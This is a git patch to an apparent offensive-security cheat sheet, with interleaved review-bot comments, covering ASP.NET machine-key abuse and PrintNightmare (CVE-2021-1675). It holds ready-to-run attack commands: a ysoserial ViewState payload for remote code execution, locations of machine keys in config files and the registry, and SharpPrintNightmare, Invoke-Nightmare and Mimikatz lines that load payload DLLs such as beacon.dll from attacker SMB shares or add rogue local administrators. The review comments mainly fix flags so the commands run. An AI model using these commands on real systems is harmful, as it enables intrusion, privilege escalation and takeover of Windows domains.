From 2f8fc7bbb99001001a279d90b378fff43490e8f0 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Mon, 5 Jul 2021 21:57:14 +0200
Subject: [PATCH] PrintNightmare - Mimikatz
---
API Key Leaks/README.md | 45 ++++++++++++++++---
.../Active Directory Attack.md | 20 ++++-----
2 files changed, 50 insertions(+), 15 deletions(-)
diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md
index 0bf5e25..b4dd55b 100644
--- a/API Key Leaks/README.md
+++ b/API Key Leaks/README.md
@@ -17,7 +17,7 @@
- [Twitter Bearer Token](#twitter-bearer-token)
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
- [HockeyApp API Token](#hockeyapp-api-token)
- - [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key)
+ - [IIS Machine Keys](#iis-machine-keys)
- [Mapbox API Token](#Mapbox-API-Token)
@@ -99,11 +99,14 @@ curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hoc
```
-### Auth Bypass using pre-published Machine Key
+### IIS Machine Keys
-> By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
+> That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
-That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
+Requirements
+* machineKey **validationKey** and **decryptionKey**
+* __VIEWSTATEGENERATOR cookies
+* __VIEWSTATE cookies
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
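Review bot: `__VIEWSTATEGENERATOR` and `__VIEWSTATE` in the new Requirements list are hidden `<input>` fields in the page body, not cookies; the two bullets should read "`__VIEWSTATEGENERATOR` hidden field" and "`__VIEWSTATE` hidden field" so a reader looks in the POST body / HTML rather than the Cookie header. The removed quote was also the only sentence explaining what a Forms Authentication ticket is (username plus issue/expiry time signed with the machine key), which the "Edit cookies with the machine key" subsection later in this patch relies on; consider keeping that one sentence next to the new quote, and since the surviving `>` line is now presented as a quotation, attach the Microsoft docs link it comes from to it rather than only to the machineKey example below.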
@@ -111,8 +114,41 @@ Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/s
```
+Common locations of **web.config** / **machine.config**
+* 32-bit
+ * C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
+ * C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
+* 64-bit
+ * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
+ * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
+* in registry when **AutoGenerate** is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab)
+ * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4
+ * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
+
Exploit with [Blacklist3r](https://github.com/NotSoSecure/Blacklist3r)
+#### Identify known machine key
+
+```powershell
+AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata --purpose=viewstate --modifier= –macdecode
+```
+
+
+#### Generate ViewState for RCE
+
+**NOTE**: In Burp you should **URL Encode Key Characters** for your payload.
+
+```powershell
+ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup " --decryptionalg="AES" --generator=ABABABAB decryptionkey="" --validationalg="SHA1" --validationkey=""
+```
+
+
+#### Edit cookies with the machine key
+
+If you have the machineKey but the viewstate is disabled.
+
+ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools
+
```powershell
# decrypt cookie
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
@@ -121,7 +157,6 @@ $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
```
-
### Mapbox API Token
A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time.
```
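Review bot: two of the new command lines will not run as written. In the "Identify known machine key" block the last flag is written with an en dash (`–macdecode`) instead of `--macdecode`, and `--encrypteddata` and `--modifier=` are left without values; suggest `--encrypteddata <__VIEWSTATE value> --modifier=<__VIEWSTATEGENERATOR value> --macdecode` so it is clear which page fields feed which flag. In the ysoserial line `decryptionkey=""` is missing its leading `--` (`--decryptionkey=""`). The registry bullets under `HKEY_CURRENT_USER` are only correct when the command runs as the application pool identity, because the auto-generated keys live in that account's hive; add a remark that from another account they are under `HKEY_USERS\<SID>\Software\Microsoft\ASP.NET\...`. In "Edit cookies with the machine key" the lead sentence "If you have the machineKey but the viewstate is disabled." is a fragment (suggest "... is disabled, you can still forge the Forms Authentication cookie."), the link points at aspnetCryptTools while the commands shown are Blacklist3r's AspDotNetWrapper, so either add the aspnetCryptTools usage or say the link is an alternative tool, and the `$ ` prompts inside a `powershell` fence should be dropped to match the other blocks in this section.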
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index f02ecaf..fec15ea 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -595,25 +595,25 @@ Requirements:
# https://github.com/cube0x0/CVE-2021-1675 - require a modified Impacket: https://github.com/cube0x0/impacket
python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'
-
-# LPE
+## LPE
SharpPrintNightmare.exe C:\addCube.dll
-
-# RCE using existing context
+## RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'
-
-# RCE using runas /netonly
+## RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123
-# LPE only (PS1 + DLL) - https://github.com/calebstewart/CVE-2021-1675
+# https://github.com/calebstewart/CVE-2021-1675
+## LPE only (PS1 + DLL)
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*"
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
-# Original POC https://github.com/afwu/PrintNightmare
-.\PrintNightmare.exe dc_ip path_to_exp user_name password
-.\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123
+# Mimikatz - https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210705
+## LPE
+misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll
+## RCE
+misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50
```
**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109) .
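Review bot: the commit subject only says "Mimikatz" was added, but this hunk also deletes the afwu/PrintNightmare original PoC and its two usage lines; keep at least the `# Original POC https://github.com/afwu/PrintNightmare` reference for attribution, or state the removal in the commit message. For the new Mimikatz lines, the LPE example passes a local path (`C:\Users\user1\Documents\mimispool.dll`) and the RCE example a UNC path (`\\10.0.2.12\smb\beacon.dll`) plus `/authdomain` `/authuser` `/authpassword`; a short comment on each line saying the library is loaded from a local file versus from the attacker's SMB share would make the distinction as explicit as it already is for the SharpPrintNightmare and CVE-2021-1675.py entries above. The `## LPE` / `## RCE` headings inside the code block are fine as comments, but the three tool groups now mix `# tool` and `## mode` markers, so the first group (`# https://github.com/cube0x0/CVE-2021-1675`) should get the same `## RCE` sub-marker for consistency.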